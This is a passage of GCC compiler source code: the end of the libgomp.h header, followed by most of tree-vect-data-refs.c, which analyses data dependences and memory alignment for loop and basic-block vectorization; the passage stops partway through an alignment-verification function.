# define ialias_str1(x) ialias_str2(x)
# define ialias_str2(x) #x
# define ialias(fn) \
extern __typeof (fn) gomp_ialias_##fn \
__attribute__ ((alias (#fn))) attribute_hidden;
# define ialias_redirect(fn) \
extern __typeof (fn) fn __asm__ (ialias_ulp "gomp_ialias_" #fn) attribute_hidden;
# define ialias_call(fn) gomp_ialias_ ## fn
#else
# define ialias(fn)
# define ialias_redirect(fn)
# define ialias_call(fn) fn
#endif
/* Helper function for priority_node_to_task() and
task_to_priority_node().
Return the offset from a task to its priority_node entry. The
priority_node entry is has a type of TYPE. */
static inline size_t
priority_queue_offset (enum priority_queue_type type)
{
return offsetof (struct gomp_task, pnode[(int) type]);
}
/* Return the task associated with a priority NODE of type TYPE. */
static inline struct gomp_task *
priority_node_to_task (enum priority_queue_type type,
struct priority_node *node)
{
return (struct gomp_task *) ((char *) node - priority_queue_offset (type));
}
/* Return the priority node of type TYPE for a given TASK. */
static inline struct priority_node *
task_to_priority_node (enum priority_queue_type type,
struct gomp_task *task)
{
return (struct priority_node *) ((char *) task
+ priority_queue_offset (type));
}
#endif /* LIBGOMP_H */
|
tree-vect-data-refs.c | /* Data References Analysis and Manipulation Utilities for Vectorization.
Copyright (C) 2003-2015 Free Software Foundation, Inc.
Contributed by Dorit Naishlos <dorit@il.ibm.com>
and Ira Rosen <irar@il.ibm.com>
This file is part of GCC.
GCC is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation; either version 3, or (at your option) any later
version.
GCC is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
for more details.
You should have received a copy of the GNU General Public License
along with GCC; see the file COPYING3. If not see
<http://www.gnu.org/licenses/>. */
#include "config.h"
#include "system.h"
#include "coretypes.h"
#include "dumpfile.h"
#include "tm.h"
#include "hash-set.h"
#include "machmode.h"
#include "vec.h"
#include "double-int.h"
#include "input.h"
#include "alias.h"
#include "symtab.h"
#include "wide-int.h"
#include "inchash.h"
#include "tree.h"
#include "fold-const.h"
#include "stor-layout.h"
#include "tm_p.h"
#include "target.h"
#include "predict.h"
#include "hard-reg-set.h"
#include "function.h"
#include "dominance.h"
#include "cfg.h"
#include "basic-block.h"
#include "gimple-pretty-print.h"
#include "tree-ssa-alias.h"
#include "internal-fn.h"
#include "tree-eh.h"
#include "gimple-expr.h"
#include "is-a.h"
#include "gimple.h"
#include "gimplify.h"
#include "gimple-iterator.h"
#include "gimplify-me.h"
#include "gimple-ssa.h"
#include "tree-phinodes.h"
#include "ssa-iterators.h"
#include "stringpool.h"
#include "tree-ssanames.h"
#include "tree-ssa-loop-ivopts.h"
#include "tree-ssa-loop-manip.h"
#include "tree-ssa-loop.h"
#include "cfgloop.h"
#include "tree-chrec.h"
#include "tree-scalar-evolution.h"
#include "tree-vectorizer.h"
#include "diagnostic-core.h"
#include "hash-map.h"
#include "plugin-api.h"
#include "ipa-ref.h"
#include "cgraph.h"
/* Need to include rtl.h, expr.h, etc. for optabs. */
#include "hashtab.h"
#include "rtl.h"
#include "flags.h"
#include "statistics.h"
#include "real.h"
#include "fixed-value.h"
#include "insn-config.h"
#include "expmed.h"
#include "dojump.h"
#include "explow.h"
#include "calls.h"
#include "emit-rtl.h"
#include "varasm.h"
#include "stmt.h"
#include "expr.h"
#include "insn-codes.h"
#include "optabs.h"
#include "builtins.h"
/* Return true if load- or store-lanes optab OPTAB is implemented for
COUNT vectors of type VECTYPE. NAME is the name of OPTAB. */
static bool
vect_lanes_optab_supported_p (const char *name, convert_optab optab,
tree vectype, unsigned HOST_WIDE_INT count)
{
machine_mode mode, array_mode;
bool limit_p;
mode = TYPE_MODE (vectype);
limit_p = !targetm.array_mode_supported_p (mode, count);
array_mode = mode_for_size (count * GET_MODE_BITSIZE (mode),
MODE_INT, limit_p);
if (array_mode == BLKmode)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"no array mode for %s[" HOST_WIDE_INT_PRINT_DEC "]\n",
GET_MODE_NAME (mode), count);
return false;
}
if (convert_optab_handler (optab, array_mode, mode) == CODE_FOR_nothing)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"cannot use %s<%s><%s>\n", name,
GET_MODE_NAME (array_mode), GET_MODE_NAME (mode));
return false;
}
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"can use %s<%s><%s>\n", name, GET_MODE_NAME (array_mode),
GET_MODE_NAME (mode));
return true;
}
/* Return the smallest scalar part of STMT.
This is used to determine the vectype of the stmt. We generally set the
vectype according to the type of the result (lhs). For stmts whose
result-type is different than the type of the arguments (e.g., demotion,
promotion), vectype will be reset appropriately (later). Note that we have
to visit the smallest datatype in this function, because that determines the
VF. If the smallest datatype in the loop is present only as the rhs of a
promotion operation - we'd miss it.
Such a case, where a variable of this datatype does not appear in the lhs
anywhere in the loop, can only occur if it's an invariant: e.g.:
'int_x = (int) short_inv', which we'd expect to have been optimized away by
invariant motion. However, we cannot rely on invariant motion to always
take invariants out of the loop, and so in the case of promotion we also
have to check the rhs.
LHS_SIZE_UNIT and RHS_SIZE_UNIT contain the sizes of the corresponding
types. */
tree
vect_get_smallest_scalar_type (gimple stmt, HOST_WIDE_INT *lhs_size_unit,
HOST_WIDE_INT *rhs_size_unit)
{
tree scalar_type = gimple_expr_type (stmt);
HOST_WIDE_INT lhs, rhs;
lhs = rhs = TREE_INT_CST_LOW (TYPE_SIZE_UNIT (scalar_type));
if (is_gimple_assign (stmt)
&& (gimple_assign_cast_p (stmt)
|| gimple_assign_rhs_code (stmt) == WIDEN_MULT_EXPR
|| gimple_assign_rhs_code (stmt) == WIDEN_LSHIFT_EXPR
|| gimple_assign_rhs_code (stmt) == FLOAT_EXPR))
{
tree rhs_type = TREE_TYPE (gimple_assign_rhs1 (stmt));
rhs = TREE_INT_CST_LOW (TYPE_SIZE_UNIT (rhs_type));
if (rhs < lhs)
scalar_type = rhs_type;
}
*lhs_size_unit = lhs;
*rhs_size_unit = rhs;
return scalar_type;
}
/* Insert DDR into LOOP_VINFO list of ddrs that may alias and need to be
tested at run-time. Return TRUE if DDR was successfully inserted.
Return false if versioning is not supported. */
static bool
vect_mark_for_runtime_alias_test (ddr_p ddr, loop_vec_info loop_vinfo)
{
struct loop *loop = LOOP_VINFO_LOOP (loop_vinfo);
if ((unsigned) PARAM_VALUE (PARAM_VECT_MAX_VERSION_FOR_ALIAS_CHECKS) == 0)
return false;
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"mark for run-time aliasing test between ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (DDR_A (ddr)));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (DDR_B (ddr)));
dump_printf (MSG_NOTE, "\n");
}
if (optimize_loop_nest_for_size_p (loop))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning not supported when optimizing"
" for size.\n");
return false;
}
/* FORNOW: We don't support versioning with outer-loop vectorization. */
if (loop->inner)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning not yet supported for outer-loops.\n");
return false;
}
/* FORNOW: We don't support creating runtime alias tests for non-constant
step. */
if (TREE_CODE (DR_STEP (DDR_A (ddr))) != INTEGER_CST
|| TREE_CODE (DR_STEP (DDR_B (ddr))) != INTEGER_CST)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning not yet supported for non-constant "
"step\n");
return false;
}
LOOP_VINFO_MAY_ALIAS_DDRS (loop_vinfo).safe_push (ddr);
return true;
}
/* Function vect_analyze_data_ref_dependence.
Return TRUE if there (might) exist a dependence between a memory-reference
DRA and a memory-reference DRB. When versioning for alias may check a
dependence at run-time, return FALSE. Adjust *MAX_VF according to
the data dependence. */
static bool
vect_analyze_data_ref_dependence (struct data_dependence_relation *ddr,
loop_vec_info loop_vinfo, int *max_vf)
{
unsigned int i;
struct loop *loop = LOOP_VINFO_LOOP (loop_vinfo);
struct data_reference *dra = DDR_A (ddr);
struct data_reference *drb = DDR_B (ddr);
stmt_vec_info stmtinfo_a = vinfo_for_stmt (DR_STMT (dra));
stmt_vec_info stmtinfo_b = vinfo_for_stmt (DR_STMT (drb));
lambda_vector dist_v;
unsigned int loop_depth;
/* In loop analysis all data references should be vectorizable. */
if (!STMT_VINFO_VECTORIZABLE (stmtinfo_a)
|| !STMT_VINFO_VECTORIZABLE (stmtinfo_b))
gcc_unreachable ();
/* Independent data accesses. */
if (DDR_ARE_DEPENDENT (ddr) == chrec_known)
return false;
if (dra == drb
|| (DR_IS_READ (dra) && DR_IS_READ (drb)))
return false;
/* Even if we have an anti-dependence then, as the vectorized loop covers at
least two scalar iterations, there is always also a true dependence.
As the vectorizer does not re-order loads and stores we can ignore
the anti-dependence if TBAA can disambiguate both DRs similar to the
case with known negative distance anti-dependences (positive
distance anti-dependences would violate TBAA constraints). */
if (((DR_IS_READ (dra) && DR_IS_WRITE (drb))
|| (DR_IS_WRITE (dra) && DR_IS_READ (drb)))
&& !alias_sets_conflict_p (get_alias_set (DR_REF (dra)),
get_alias_set (DR_REF (drb))))
return false;
/* Unknown data dependence. */
if (DDR_ARE_DEPENDENT (ddr) == chrec_dont_know)
{
/* If user asserted safelen consecutive iterations can be
executed concurrently, assume independence. */
if (loop->safelen >= 2)
{
if (loop->safelen < *max_vf)
*max_vf = loop->safelen;
LOOP_VINFO_NO_DATA_DEPENDENCIES (loop_vinfo) = false;
return false;
}
if (STMT_VINFO_GATHER_P (stmtinfo_a)
|| STMT_VINFO_GATHER_P (stmtinfo_b))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning for alias not supported for: "
"can't determine dependence between ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (dra));
dump_printf (MSG_MISSED_OPTIMIZATION, " and ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (drb));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return true;
}
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning for alias required: "
"can't determine dependence between ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (dra));
dump_printf (MSG_MISSED_OPTIMIZATION, " and ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (drb));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
/* Add to list of ddrs that need to be tested at run-time. */
return !vect_mark_for_runtime_alias_test (ddr, loop_vinfo);
}
/* Known data dependence. */
if (DDR_NUM_DIST_VECTS (ddr) == 0)
{
/* If user asserted safelen consecutive iterations can be
executed concurrently, assume independence. */
if (loop->safelen >= 2)
{
if (loop->safelen < *max_vf)
*max_vf = loop->safelen;
LOOP_VINFO_NO_DATA_DEPENDENCIES (loop_vinfo) = false;
return false;
}
if (STMT_VINFO_GATHER_P (stmtinfo_a)
|| STMT_VINFO_GATHER_P (stmtinfo_b))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning for alias not supported for: "
"bad dist vector for ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (dra));
dump_printf (MSG_MISSED_OPTIMIZATION, " and ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (drb));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return true;
}
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning for alias required: "
"bad dist vector for ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_MISSED_OPTIMIZATION, " and ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
/* Add to list of ddrs that need to be tested at run-time. */
return !vect_mark_for_runtime_alias_test (ddr, loop_vinfo);
}
loop_depth = index_in_loop_nest (loop->num, DDR_LOOP_NEST (ddr));
FOR_EACH_VEC_ELT (DDR_DIST_VECTS (ddr), i, dist_v)
{
int dist = dist_v[loop_depth];
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"dependence distance = %d.\n", dist);
if (dist == 0)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"dependence distance == 0 between ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
/* When we perform grouped accesses and perform implicit CSE
by detecting equal accesses and doing disambiguation with
runtime alias tests like for
.. = a[i];
.. = a[i+1];
a[i] = ..;
a[i+1] = ..;
*p = ..;
.. = a[i];
.. = a[i+1];
where we will end up loading { a[i], a[i+1] } once, make
sure that inserting group loads before the first load and
stores after the last store will do the right thing.
Similar for groups like
a[i] = ...;
... = a[i];
a[i+1] = ...;
where loads from the group interleave with the store. */
if (STMT_VINFO_GROUPED_ACCESS (stmtinfo_a)
|| STMT_VINFO_GROUPED_ACCESS (stmtinfo_b))
{
gimple earlier_stmt;
earlier_stmt = get_earlier_stmt (DR_STMT (dra), DR_STMT (drb));
if (DR_IS_WRITE
(STMT_VINFO_DATA_REF (vinfo_for_stmt (earlier_stmt))))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"READ_WRITE dependence in interleaving."
"\n");
return true;
}
}
continue;
}
if (dist > 0 && DDR_REVERSED_P (ddr))
{
/* If DDR_REVERSED_P the order of the data-refs in DDR was
reversed (to make distance vector positive), and the actual
distance is negative. */
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"dependence distance negative.\n");
/* Record a negative dependence distance to later limit the
amount of stmt copying / unrolling we can perform.
Only need to handle read-after-write dependence. */
if (DR_IS_READ (drb)
&& (STMT_VINFO_MIN_NEG_DIST (stmtinfo_b) == 0
|| STMT_VINFO_MIN_NEG_DIST (stmtinfo_b) > (unsigned)dist))
STMT_VINFO_MIN_NEG_DIST (stmtinfo_b) = dist;
continue;
}
if (abs (dist) >= 2
&& abs (dist) < *max_vf)
{
/* The dependence distance requires reduction of the maximal
vectorization factor. */
*max_vf = abs (dist);
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"adjusting maximal vectorization factor to %i\n",
*max_vf);
}
if (abs (dist) >= *max_vf)
{
/* Dependence distance does not create dependence, as far as
vectorization is concerned, in this case. */
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"dependence distance >= VF.\n");
continue;
}
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized, possible dependence "
"between data-refs ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_NOTE, "\n");
}
return true;
}
return false;
}
/* Function vect_analyze_data_ref_dependences.
Examine all the data references in the loop, and make sure there do not
exist any data dependences between them. Set *MAX_VF according to
the maximum vectorization factor the data dependences allow. */
bool
vect_analyze_data_ref_dependences (loop_vec_info loop_vinfo, int *max_vf)
{
unsigned int i;
struct data_dependence_relation *ddr;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"=== vect_analyze_data_ref_dependences ===\n");
LOOP_VINFO_NO_DATA_DEPENDENCIES (loop_vinfo) = true;
if (!compute_all_dependences (LOOP_VINFO_DATAREFS (loop_vinfo),
&LOOP_VINFO_DDRS (loop_vinfo),
LOOP_VINFO_LOOP_NEST (loop_vinfo), true))
return false;
FOR_EACH_VEC_ELT (LOOP_VINFO_DDRS (loop_vinfo), i, ddr)
if (vect_analyze_data_ref_dependence (ddr, loop_vinfo, max_vf))
return false;
return true;
}
/* Function vect_slp_analyze_data_ref_dependence.
Return TRUE if there (might) exist a dependence between a memory-reference
DRA and a memory-reference DRB. When versioning for alias may check a
dependence at run-time, return FALSE. Adjust *MAX_VF according to
the data dependence. */
static bool
vect_slp_analyze_data_ref_dependence (struct data_dependence_relation *ddr)
{
struct data_reference *dra = DDR_A (ddr);
struct data_reference *drb = DDR_B (ddr);
/* We need to check dependences of statements marked as unvectorizable
as well, they still can prohibit vectorization. */
/* Independent data accesses. */
if (DDR_ARE_DEPENDENT (ddr) == chrec_known)
return false;
if (dra == drb)
return false;
/* Read-read is OK. */
if (DR_IS_READ (dra) && DR_IS_READ (drb))
return false;
/* If dra and drb are part of the same interleaving chain consider
them independent. */
if (STMT_VINFO_GROUPED_ACCESS (vinfo_for_stmt (DR_STMT (dra)))
&& (GROUP_FIRST_ELEMENT (vinfo_for_stmt (DR_STMT (dra)))
== GROUP_FIRST_ELEMENT (vinfo_for_stmt (DR_STMT (drb)))))
return false;
/* Unknown data dependence. */
if (DDR_ARE_DEPENDENT (ddr) == chrec_dont_know)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"can't determine dependence between ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_MISSED_OPTIMIZATION, " and ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
}
else if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"determined dependence between ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_NOTE, "\n");
}
/* We do not vectorize basic blocks with write-write dependencies. */
if (DR_IS_WRITE (dra) && DR_IS_WRITE (drb))
return true;
/* If we have a read-write dependence check that the load is before the store.
When we vectorize basic blocks, vector load can be only before
corresponding scalar load, and vector store can be only after its
corresponding scalar store. So the order of the acceses is preserved in
case the load is before the store. */
gimple earlier_stmt = get_earlier_stmt (DR_STMT (dra), DR_STMT (drb));
if (DR_IS_READ (STMT_VINFO_DATA_REF (vinfo_for_stmt (earlier_stmt))))
{
/* That only holds for load-store pairs taking part in vectorization. */
if (STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dra)))
&& STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (drb))))
return false;
}
return true;
}
/* Function vect_analyze_data_ref_dependences.
Examine all the data references in the basic-block, and make sure there
do not exist any data dependences between them. Set *MAX_VF according to
the maximum vectorization factor the data dependences allow. */
bool
vect_slp_analyze_data_ref_dependences (bb_vec_info bb_vinfo)
{
struct data_dependence_relation *ddr;
unsigned int i;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"=== vect_slp_analyze_data_ref_dependences ===\n");
if (!compute_all_dependences (BB_VINFO_DATAREFS (bb_vinfo),
&BB_VINFO_DDRS (bb_vinfo),
vNULL, true))
return false;
FOR_EACH_VEC_ELT (BB_VINFO_DDRS (bb_vinfo), i, ddr)
if (vect_slp_analyze_data_ref_dependence (ddr))
return false;
return true;
}
/* Function vect_compute_data_ref_alignment
Compute the misalignment of the data reference DR.
Output:
1. If during the misalignment computation it is found that the data reference
cannot be vectorized then false is returned.
2. DR_MISALIGNMENT (DR) is defined.
FOR NOW: No analysis is actually performed. Misalignment is calculated
only for trivial cases. TODO. */
static bool
vect_compute_data_ref_alignment (struct data_reference *dr)
{
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
struct loop *loop = NULL;
tree ref = DR_REF (dr);
tree vectype;
tree base, base_addr;
bool base_aligned;
tree misalign;
tree aligned_to;
unsigned HOST_WIDE_INT alignment;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"vect_compute_data_ref_alignment:\n");
if (loop_vinfo)
loop = LOOP_VINFO_LOOP (loop_vinfo);
/* Initialize misalignment to unknown. */
SET_DR_MISALIGNMENT (dr, -1);
/* Strided loads perform only component accesses, misalignment information
is irrelevant for them. */
if (STMT_VINFO_STRIDE_LOAD_P (stmt_info))
return true;
misalign = DR_INIT (dr);
aligned_to = DR_ALIGNED_TO (dr);
base_addr = DR_BASE_ADDRESS (dr);
vectype = STMT_VINFO_VECTYPE (stmt_info);
/* In case the dataref is in an inner-loop of the loop that is being
vectorized (LOOP), we use the base and misalignment information
relative to the outer-loop (LOOP). This is ok only if the misalignment
stays the same throughout the execution of the inner-loop, which is why
we have to check that the stride of the dataref in the inner-loop evenly
divides by the vector size. */
if (loop && nested_in_vect_loop_p (loop, stmt))
{
tree step = DR_STEP (dr);
HOST_WIDE_INT dr_step = TREE_INT_CST_LOW (step);
if (dr_step % GET_MODE_SIZE (TYPE_MODE (vectype)) == 0)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"inner step divides the vector-size.\n");
misalign = STMT_VINFO_DR_INIT (stmt_info);
aligned_to = STMT_VINFO_DR_ALIGNED_TO (stmt_info);
base_addr = STMT_VINFO_DR_BASE_ADDRESS (stmt_info);
}
else
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"inner step doesn't divide the vector-size.\n");
misalign = NULL_TREE;
}
}
/* Similarly, if we're doing basic-block vectorization, we can only use
base and misalignment information relative to an innermost loop if the
misalignment stays the same throughout the execution of the loop.
As above, this is the case if the stride of the dataref evenly divides
by the vector size. */
if (!loop)
{
tree step = DR_STEP (dr);
HOST_WIDE_INT dr_step = TREE_INT_CST_LOW (step);
if (dr_step % GET_MODE_SIZE (TYPE_MODE (vectype)) != 0)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"SLP: step doesn't divide the vector-size.\n");
misalign = NULL_TREE;
}
}
alignment = TYPE_ALIGN_UNIT (vectype);
if ((compare_tree_int (aligned_to, alignment) < 0)
|| !misalign)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"Unknown alignment for access: ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, ref);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return true;
}
/* To look at alignment of the base we have to preserve an inner MEM_REF
as that carries alignment information of the actual access. */
base = ref;
while (handled_component_p (base))
base = TREE_OPERAND (base, 0);
if (TREE_CODE (base) == MEM_REF)
base = build2 (MEM_REF, TREE_TYPE (base), base_addr,
build_int_cst (TREE_TYPE (TREE_OPERAND (base, 1)), 0));
if (get_object_alignment (base) >= TYPE_ALIGN (vectype))
base_aligned = true;
else
base_aligned = false;
if (!base_aligned)
{
/* Strip an inner MEM_REF to a bare decl if possible. */
if (TREE_CODE (base) == MEM_REF
&& integer_zerop (TREE_OPERAND (base, 1))
&& TREE_CODE (TREE_OPERAND (base, 0)) == ADDR_EXPR)
base = TREE_OPERAND (TREE_OPERAND (base, 0), 0);
if (!vect_can_force_dr_alignment_p (base, TYPE_ALIGN (vectype)))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"can't force alignment of ref: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, ref);
dump_printf (MSG_NOTE, "\n");
}
return true;
}
/* Force the alignment of the decl.
NOTE: This is the only change to the code we make during
the analysis phase, before deciding to vectorize the loop. */
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location, "force alignment of ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, ref);
dump_printf (MSG_NOTE, "\n");
}
((dataref_aux *)dr->aux)->base_decl = base;
((dataref_aux *)dr->aux)->base_misaligned = true;
}
/* If this is a backward running DR then first access in the larger
vectype actually is N-1 elements before the address in the DR.
Adjust misalign accordingly. */
if (tree_int_cst_sgn (DR_STEP (dr)) < 0)
{
tree offset = ssize_int (TYPE_VECTOR_SUBPARTS (vectype) - 1);
/* DR_STEP(dr) is the same as -TYPE_SIZE of the scalar type,
otherwise we wouldn't be here. */
offset = fold_build2 (MULT_EXPR, ssizetype, offset, DR_STEP (dr));
/* PLUS because DR_STEP was negative. */
misalign = size_binop (PLUS_EXPR, misalign, offset);
}
SET_DR_MISALIGNMENT (dr,
wi::mod_floor (misalign, alignment, SIGNED).to_uhwi ());
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"misalign = %d bytes of ref ", DR_MISALIGNMENT (dr));
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, ref);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return true;
}
/* Function vect_compute_data_refs_alignment
Compute the misalignment of data references in the loop.
Return FALSE if a data reference is found that cannot be vectorized. */
static bool
vect_compute_data_refs_alignment (loop_vec_info loop_vinfo,
bb_vec_info bb_vinfo)
{
vec<data_reference_p> datarefs;
struct data_reference *dr;
unsigned int i;
if (loop_vinfo)
datarefs = LOOP_VINFO_DATAREFS (loop_vinfo);
else
datarefs = BB_VINFO_DATAREFS (bb_vinfo);
FOR_EACH_VEC_ELT (datarefs, i, dr)
if (STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dr)))
&& !vect_compute_data_ref_alignment (dr))
{
if (bb_vinfo)
{
/* Mark unsupported statement as unvectorizable. */
STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dr))) = false;
continue;
}
else
return false;
}
return true;
}
/* Function vect_update_misalignment_for_peel
DR - the data reference whose misalignment is to be adjusted.
DR_PEEL - the data reference whose misalignment is being made
zero in the vector loop by the peel.
NPEEL - the number of iterations in the peel loop if the misalignment
of DR_PEEL is known at compile time. */
static void
vect_update_misalignment_for_peel (struct data_reference *dr,
struct data_reference *dr_peel, int npeel)
{
unsigned int i;
vec<dr_p> same_align_drs;
struct data_reference *current_dr;
int dr_size = GET_MODE_SIZE (TYPE_MODE (TREE_TYPE (DR_REF (dr))));
int dr_peel_size = GET_MODE_SIZE (TYPE_MODE (TREE_TYPE (DR_REF (dr_peel))));
stmt_vec_info stmt_info = vinfo_for_stmt (DR_STMT (dr));
stmt_vec_info peel_stmt_info = vinfo_for_stmt (DR_STMT (dr_peel));
/* For interleaved data accesses the step in the loop must be multiplied by
the size of the interleaving group. */
if (STMT_VINFO_GROUPED_ACCESS (stmt_info))
dr_size *= GROUP_SIZE (vinfo_for_stmt (GROUP_FIRST_ELEMENT (stmt_info)));
if (STMT_VINFO_GROUPED_ACCESS (peel_stmt_info))
dr_peel_size *= GROUP_SIZE (peel_stmt_info);
/* It can be assumed that the data refs with the same alignment as dr_peel
are aligned in the vector loop. */
same_align_drs
= STMT_VINFO_SAME_ALIGN_REFS (vinfo_for_stmt (DR_STMT (dr_peel)));
FOR_EACH_VEC_ELT (same_align_drs, i, current_dr)
{
if (current_dr != dr)
continue;
gcc_assert (DR_MISALIGNMENT (dr) / dr_size ==
DR_MISALIGNMENT (dr_peel) / dr_peel_size);
SET_DR_MISALIGNMENT (dr, 0);
return;
}
if (known_alignment_for_access_p (dr)
&& known_alignment_for_access_p (dr_peel))
{
bool negative = tree_int_cst_compare (DR_STEP (dr), size_zero_node) < 0;
int misal = DR_MISALIGNMENT (dr);
tree vectype = STMT_VINFO_VECTYPE (stmt_info);
misal += negative ? -npeel * dr_size : npeel * dr_size;
misal &= (TYPE_ALIGN (vectype) / BITS_PER_UNIT) - 1;
SET_DR_MISALIGNMENT (dr, misal);
return;
}
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location, "Setting misalignment to -1.\n");
SET_DR_MISALIGNMENT (dr, -1);
}
/* Function vect_verify_datarefs_alignment
Return TRUE if all data references in the loop can be
handled with respect to alignment. */
bool
vect_verify_datarefs_alignment (loop_vec_info loop_vinfo, bb_vec_info bb_vinfo)
{
vec<data_reference_p> datarefs;
struct data_reference *dr;
enum dr_alignment_support supportable_dr_alignment;
unsigned int i;
if (loop_vinfo)
datarefs = LOOP_VINFO_DATAREFS (loop_vinfo);
else
datarefs = BB_VINFO_DATAREFS (bb_vinfo);
FOR_EACH_VEC_ELT (datarefs, i, dr)
{
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
if (!STMT_VINFO_RELEVANT_P (stmt_info))
continue;
/* For interleaving, only the alignment of the first access matters.
Skip statements marked as not vectorizable. */
if ((STMT_VINFO_GROUPED_ACCESS (stmt_info)
&& GROUP_FIRST_ELEMENT (stmt_info) != stmt)
|| !STMT_VINFO_VECTORIZABLE (stmt_info))
continue;
/* Strided loads perform only component accesses, alignment is
irrelevant for them. */
if (STMT_VINFO_STRIDE_LOAD_P (stmt_info))
continue;
supportable_dr_alignment = vect_supportable_dr_alignment (dr, false);
if (!supportable_dr_alignment)
{
if (dump_enabled_p ())
{
if (DR_IS_READ (dr))
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: unsupported unaligned load.");
else
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: unsupported unaligned "
"store.");
